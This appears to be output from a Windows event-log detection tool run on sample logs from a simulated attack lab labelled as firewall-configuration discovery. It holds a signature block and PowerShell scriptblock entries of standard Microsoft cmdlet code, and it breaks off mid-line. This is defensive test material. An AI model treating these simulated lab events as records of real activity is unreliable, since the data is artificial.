AQUFBzAChjxodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY3Jv # c29mdFRpbWVTdGFtcFBDQS5jcnQwEwYDVR0lBAwwCgYIKwYBBQUHAwgwDQYJKoZI # hvcNAQEFBQADggEBAJaVlxhREadlaCDXqFbP6lUQVKjx5/JsbwouUz8YgQjPN/Y1 # ymKKoJBe4u9HzqrHBZj93hq26BKkmrnKpWKvyOY+ODJcA9PzaPlgnMeyJdykTGuP # 
BsvYtsFYIn6E1Wu56PE+L3n28vpsaOjKAl8BvrGgbPmPRbm4SwZfxJSO9+3r1yFa # uFZbeGfcQAl82pKj27zQmh2O5snaz1Iff7+W3owsX20ilqNJ+acaIl7/6cpyJUC4 # 87hUHlrIV1CyiyLmEOyt7aUQlFLU7VtXgskXVPZ03lGrVDTglUY63lUwGhdwL5f2 # CgYipvqCjochior3gYxSN0w6jQRbNcvzG4N1vl0wggTsMIID1KADAgECAhMzAAAA # sBGvCovQO5/dAAEAAACwMA0GCSqGSIb3DQEBBQUAMHkxCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xIzAhBgNVBAMTGk1pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBMB4XDTEzMDEyNDIyMzMzOVoXDTE0MDQyNDIyMzMzOVowgYMxCzAJ # BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k # MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xDTALBgNVBAsTBE1PUFIx # HjAcBgNVBAMTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjCCASIwDQYJKoZIhvcNAQEB # BQADggEPADCCAQoCggEBAOivXKIgDfgofLwFe3+t7ut2rChTPzrbQH2zjjPmVz+l # URU0VKXPtIupP6g34S1Q7TUWTu9NetsTdoiwLPBZXKnr4dcpdeQbhSeb8/gtnkE2 # KwtA+747urlcdZMWUkvKM8U3sPPrfqj1QRVcCGUdITfwLLoiCxCxEJ13IoWEfE+5 # G5Cw9aP+i/QMmk6g9ckKIeKq4wE2R/0vgmqBA/WpNdyUV537S9QOgts4jxL+49Z6 # dIhk4WLEJS4qrp0YHw4etsKvJLQOULzeHJNcSaZ5tbbbzvlweygBhLgqKc+/qQUF # 4eAPcU39rVwjgynrx8VKyOgnhNN+xkMLlQAFsU9lccUCAwEAAaOCAWAwggFcMBMG # A1UdJQQMMAoGCCsGAQUFBwMDMB0GA1UdDgQWBBRZcaZaM03amAeA/4Qevof5cjJB # 8jBRBgNVHREESjBIpEYwRDENMAsGA1UECxMETU9QUjEzMDEGA1UEBRMqMzE1OTUr # NGZhZjBiNzEtYWQzNy00YWEzLWE2NzEtNzZiYzA1MjM0NGFkMB8GA1UdIwQYMBaA # FMsR6MrStBZYAck3LjMWFrlMmgofMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9j # cmwubWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY0NvZFNpZ1BDQV8w # OC0zMS0yMDEwLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6 # Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljQ29kU2lnUENBXzA4LTMx # LTIwMTAuY3J0MA0GCSqGSIb3DQEBBQUAA4IBAQAx124qElczgdWdxuv5OtRETQie # 7l7falu3ec8CnLx2aJ6QoZwLw3+ijPFNupU5+w3g4Zv0XSQPG42IFTp8263Os8ls # ujksRX0kEVQmMA0N/0fqAwfl5GZdLHudHakQ+hywdPJPaWueqSSE2u2WoN9zpO9q # GqxLYp7xfMAUf0jNTbJE+fA8k21C2Oh85hegm2hoCSj5ApfvEQO6Z1Ktwemzc6bS # Y81K4j7k8079/6HguwITO10g3lU/o66QQDE4dSheBKlGbeb1enlAvR/N6EXVruJd # 
PvV1x+ZmY2DM1ZqEh40kMPfvNNBjHbFCZ0oOS786Du+2lTqnOOQlkgimiGaCMIIF # vDCCA6SgAwIBAgIKYTMmGgAAAAAAMTANBgkqhkiG9w0BAQUFADBfMRMwEQYKCZIm # iZPyLGQBGRYDY29tMRkwFwYKCZImiZPyLGQBGRYJbWljcm9zb2Z0MS0wKwYDVQQD # EyRNaWNyb3NvZnQgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkwHhcNMTAwODMx # MjIxOTMyWhcNMjAwODMxMjIyOTMyWjB5MQswCQYDVQQGEwJVUzETMBEGA1UECBMK # V2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0 # IENvcnBvcmF0aW9uMSMwIQYDVQQDExpNaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBD # QTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALJyWVwZMGS/HZpgICBC # mXZTbD4b1m/My/Hqa/6XFhDg3zp0gxq3L6Ay7P/ewkJOI9VyANs1VwqJyq4gSfTw # aKxNS42lvXlLcZtHB9r9Jd+ddYjPqnNEf9eB2/O98jakyVxF3K+tPeAoaJcap6Vy # c1bxF5Tk/TWUcqDWdl8ed0WDhTgW0HNbBbpnUo2lsmkv2hkL/pJ0KeJ2L1TdFDBZ # +NKNYv3LyV9GMVC5JxPkQDDPcikQKCLHN049oDI9kM2hOAaFXE5WgigqBTK3S9dP # Y+fSLWLxRT3nrAgA9kahntFbjCZT6HqqSvJGzzc8OJ60d1ylF56NyxGPVjzBrAlf # A9MCAwEAAaOCAV4wggFaMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFMsR6MrS # tBZYAck3LjMWFrlMmgofMAsGA1UdDwQEAwIBhjASBgkrBgEEAYI3FQEEBQIDAQAB # MCMGCSsGAQQBgjcVAgQWBBT90TFO0yaKleGYYDuoMW+mPLzYLTAZBgkrBgEEAYI3 # FAIEDB4KAFMAdQBiAEMAQTAfBgNVHSMEGDAWgBQOrIJgQFYnl+UlE/wq4QpTlVnk # pDBQBgNVHR8ESTBHMEWgQ6BBhj9odHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtp # L2NybC9wcm9kdWN0cy9taWNyb3NvZnRyb290Y2VydC5jcmwwVAYIKwYBBQUHAQEE # SDBGMEQGCCsGAQUFBzAChjhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpL2Nl # cnRzL01pY3Jvc29mdFJvb3RDZXJ0LmNydDANBgkqhkiG9w0BAQUFAAOCAgEAWTk+ # fyZGr+tvQLEytWrrDi9uqEn361917Uw7LddDrQv+y+ktMaMjzHxQmIAhXaw9L0y6 # oqhWnONwu7i0+Hm1SXL3PupBf8rhDBdpy6WcIC36C1DEVs0t40rSvHDnqA2iA6VW # 4LiKS1fylUKc8fPv7uOGHzQ8uFaa8FMjhSqkghyT4pQHHfLiTviMocroE6WRTsgb # 0o9ylSpxbZsa+BzwU9ZnzCL/XB3Nooy9J7J5Y1ZEolHN+emjWFbdmwJFRC9f9Nqu # 1IIybvyklRPk62nnqaIsvsgrEA5ljpnb9aL6EiYJZTiU8XofSrvR4Vbo0HiWGFzJ # NRZf3ZMdSY4tvq00RBzuEBUaAF3dNVshzpjHCe6FDoxPbQ4TTj18KUicctHzbMrB # 7HCjV5JXfZSNoBtIA1r3z6NnCnSlNu0tLxfI5nI3EvRvsTxngvlSso0zFmUeDord # EN5k9G/ORtTTF+l5xAS00/ss3x+KnqwK+xMnQK3k+eGpf0a7B2BHZWBATrBC7E7t # 
s3Z52Ao0CW0cgDEf4g5U3eWh++VHEK1kmP9QFi58vwUheuKVQSdpw5OPlcmN2Jsh # rg1cnPCiroZogwxqLbt2awAdlq3yFnv2FoMkuYjPaqhHMS+a3ONxPdcAfmJH0c6I # ybgY+g5yjcGjPa8CQGr/aZuW4hCoELQ3UAjWwz0wggYHMIID76ADAgECAgphFmg0 # AAAAAAAcMA0GCSqGSIb3DQEBBQUAMF8xEzARBgoJkiaJk/IsZAEZFgNjb20xGTAX # BgoJkiaJk/IsZAEZFgltaWNyb3NvZnQxLTArBgNVBAMTJE1pY3Jvc29mdCBSb290 # IENlcnRpZmljYXRlIEF1dGhvcml0eTAeFw0wNzA0MDMxMjUzMDlaFw0yMTA0MDMx # MzAzMDlaMHcxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYD # VQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xITAf # BgNVBAMTGE1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQTCCASIwDQYJKoZIhvcNAQEB # BQADggEPADCCAQoCggEBAJ+hbLHf20iSKnxrLhnhveLjxZlRI1Ctzt0YTiQP7tGn # 0UytdDAgEesH1VSVFUmUG0KSrphcMCbaAGvoe73siQcP9w4EmPCJzB/LMySHnfL0 # Zxws/HvniB3q506jocEjU8qN+kXPCdBer9CwQgSi+aZsk2fXKNxGU7CG0OUoRi4n # rIZPVVIM5AMs+2qQkDBuh/NZMJ36ftaXs+ghl3740hPzCLdTbVK0RZCfSABKR2YR # JylmqJfk0waBSqL5hKcRRxQJgp+E7VV4/gGaHVAIhQAQMEbtt94jRrvELVSfrx54 # QTF3zJvfO4OToWECtR0Nsfz3m7IBziJLVP/5BcPCIAsCAwEAAaOCAaswggGnMA8G # A1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFCM0+NlSRnAK7UD7dvuzK7DDNbMPMAsG # A1UdDwQEAwIBhjAQBgkrBgEEAYI3FQEEAwIBADCBmAYDVR0jBIGQMIGNgBQOrIJg # QFYnl+UlE/wq4QpTlVnkpKFjpGEwXzETMBEGCgmSJomT8ixkARkWA2NvbTEZMBcG # CgmSJomT8ixkARkWCW1pY3Jvc29mdDEtMCsGA1UEAxMkTWljcm9zb2Z0IFJvb3Qg # Q2VydGlmaWNhdGUgQXV0aG9yaXR5ghB5rRahSqClrUxzWPQHEy5lMFAGA1UdHwRJ # MEcwRaBDoEGGP2h0dHA6Ly9jcmwubWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1 # Y3RzL21pY3Jvc29mdHJvb3RjZXJ0LmNybDBUBggrBgEFBQcBAQRIMEYwRAYIKwYB # BQUHMAKGOGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljcm9z # b2Z0Um9vdENlcnQuY3J0MBMGA1UdJQQMMAoGCCsGAQUFBwMIMA0GCSqGSIb3DQEB # BQUAA4ICAQAQl4rDXANENt3ptK132855UU0BsS50cVttDBOrzr57j7gu1BKijG1i # uFcCy04gE1CZ3XpA4le7r1iaHOEdAYasu3jyi9DsOwHu4r6PCgXIjUji8FMV3U+r # kuTnjWrVgMHmlPIGL4UD6ZEqJCJw+/b85HiZLg33B+JwvBhOnY5rCnKVuKE5nGct # xVEO6mJcPxaYiyA/4gcaMvnMMUp2MT0rcgvI6nA9/4UKE9/CCmGO8Ne4F+tOi3/F # NSteo7/rvH0LQnvUU3Ih7jDKu3hlXFsBFwoUDtLaFJj1PLlmWLMtL+f5hYbMUVbo # 
nXCUbKw5TNT2eb+qGHpiKe+imyk0BncaYsk9Hm0fgvALxyy7z0Oz5fnsfbXjpKh0 # NbhOxXEjEiZ2CzxSjHFaRkMUvLOzsE1nyJ9C/4B5IYCeFTBm6EISXhrIniIh0EPp # K+m79EjMLNTYMoBMJipIJF9a6lbvpt6Znco6b72BJ3QGEe52Ib+bgsEnVLaxaj2J # oXZhtG6hE6a/qkfwEm/9ijJssv7fUciMI8lmvZ0dhxJkAj0tr1mPuOQh5bWwymO0 # eFQF1EEuUKyUsKV4q7OglnUa2ZKHE3UiLzKoCG6gW4wlv6DvhMoh1useT8ma7kng # 9wFlb4kLfchpyOZu6qeXzjEp/w7FW1zYTRuh2Povnj8uVRZryROj/TGCBKcwggSj # AgEBMIGQMHkxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYD # VQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xIzAh # BgNVBAMTGk1pY3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBAhMzAAAAsBGvCovQO5/d # AAEAAACwMAkGBSsOAwIaBQCggcAwGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwIwYJKoZIhvcNAQkEMRYEFClk # UQl5qDpcmXxdpFeDJK8FifcsMGAGCisGAQQBgjcCAQwxUjBQoCaAJABXAGkAbgBk # AG8AdwBzACAAUABvAHcAZQByAFMAaABlAGwAbKEmgCRodHRwOi8vd3d3Lm1pY3Jv # c29mdC5jb20vcG93ZXJzaGVsbCAwDQYJKoZIhvcNAQEBBQAEggEALlxQato88b0W # GuCgTkjSdxozipikRZRALhDIbPeqH6HtmgJcwK723FNOko6J0Xrhnt1w+Ypx77X2 # 8yP9Hu2sG+Cm+vH4RcLCKR9zAUQGmURsoNhCcRebCKchavCcPqYzL8WmMToUVuEB # epnqGcNr8gMvhur6+Tw22bJewK48IdD96JBDVEoihHj8d0jwM19UFPuT+EmebCRv # 8ii/hESmbCZnwQclRzaoA3oJ+odsWN+XbE3fHhrGSfnE7yaiMKsyHKQ+RsV9c1x9 # /XgOkPj1o/cfKgQ0qeOamP7HmABCWv9jGBaQ/lpLASraT6gaTl9yEPvuKx1ozorh # G1o2H651lKGCAigwggIkBgkqhkiG9w0BCQYxggIVMIICEQIBATCBjjB3MQswCQYD # VQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEe # MBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSEwHwYDVQQDExhNaWNyb3Nv # ZnQgVGltZS1TdGFtcCBQQ0ECEzMAAAA1KO5hU5IiYZEAAAAAADUwCQYFKw4DAhoF # AKBdMBgGCSqGSIb3DQEJAzELBgkqhkiG9w0BBwEwHAYJKoZIhvcNAQkFMQ8XDTEz # MTIxODAwMjI1OFowIwYJKoZIhvcNAQkEMRYEFKH1XT6678OZm4aTERf5dKwwQZed # MA0GCSqGSIb3DQEBBQUABIIBAGgc0v8jALuDbFhj0n+eoe+T+K3O7SCk9SDcc8wC # 9MP+HYeyr7IvyMJY9Prn1v/JEkUNBczhWmFluGBzw1ASpTkP5hJRbdZFiQkbtqR1 # PZi8TWsbcoWjbqzwR3fgiwydRlkDu0zKO+P3pbuHFgO2ACb7ggLRllTgfWNJFZGg # iHFwS0JLQttb18AZTZyt7VteGhzOrcfRP97+bPpidJXfR1eMXbeoXuAROO0LdNP1 # 
6QcsS/++dFMLo+s7ISTcdh9OTKg672kD7zo2+UKZ/MvJbsOikD7cFJppM2ZDCnvi # S5HhTmzKz47z2m+/DsWq7NMZ1pfJFojTeMw8niuUPNOZWRg= # SIG # End signature block",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-FileHash { [CmdletBinding(DefaultParameterSetName = ""Path"")] param( [Parameter(Mandatory, ParameterSetName=""Path"", Position = 0)] [System.String[]] $Path, [Parameter(Mandatory, ParameterSetName=""LiteralPath"", ValueFromPipelineByPropertyName = $true)] [Alias(""PSPath"")] [System.String[]] $LiteralPath, [Parameter(Mandatory, ParameterSetName=""Stream"")] [System.IO.Stream] $InputStream, [ValidateSet(""SHA1"", ""SHA256"", ""SHA384"", ""SHA512"", ""MACTripleDES"", ""MD5"", ""RIPEMD160"")] [System.String] $Algorithm=""SHA256"" ) begin { # Construct the strongly-typed crypto object $hasher = [System.Security.Cryptography.HashAlgorithm]::Create($Algorithm) } process { if($PSCmdlet.ParameterSetName -eq ""Stream"") { GetStreamHash -InputStream $InputStream -RelatedPath $null -Hasher $hasher } else { $pathsToProcess = @() if($PSCmdlet.ParameterSetName -eq ""LiteralPath"") { $pathsToProcess += Resolve-Path -LiteralPath $LiteralPath | Foreach-Object ProviderPath } if($PSCmdlet.ParameterSetName -eq ""Path"") { $pathsToProcess += Resolve-Path $Path | Foreach-Object ProviderPath } foreach($filePath in $pathsToProcess) { if(Test-Path -LiteralPath $filePath -PathType Container) { continue } try { # Read the file specified in $FilePath as a Byte array [system.io.stream]$stream = [system.io.file]::OpenRead($filePath) GetStreamHash -InputStream $stream -RelatedPath $filePath -Hasher $hasher } catch [Exception] { $errorMessage = 
[Microsoft.PowerShell.Commands.UtilityResources]::FileReadError -f $FilePath, $_ Write-Error -Message $errorMessage -Category ReadError -ErrorId ""FileReadError"" -TargetObject $FilePath return } finally { if($stream) { $stream.Close() } } } } } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function GetStreamHash { param( [System.IO.Stream] $InputStream, [System.String] $RelatedPath, [System.Security.Cryptography.HashAlgorithm] $Hasher) # Compute file-hash using the crypto object [Byte[]] $computedHash = $Hasher.ComputeHash($InputStream) [string] $hash = [BitConverter]::ToString($computedHash) -replace '-','' if ($RelatedPath -eq $null) { $retVal = [PSCustomObject] @{ Algorithm = $Algorithm.ToUpperInvariant() Hash = $hash } $retVal.psobject.TypeNames.Insert(0, ""Microsoft.Powershell.Utility.FileHash"") $retVal } else { $retVal = [PSCustomObject] @{ Algorithm = $Algorithm.ToUpperInvariant() Hash = $hash Path = $RelatedPath } $retVal.psobject.TypeNames.Insert(0, ""Microsoft.Powershell.Utility.FileHash"") $retVal } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if 
($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='cim:CreateInstance0')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Owner}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Program}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Package}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Service}, [Parameter(ParameterSetName='cim:CreateInstance0')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${LocalUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] 
${Encryption}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = 
$true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 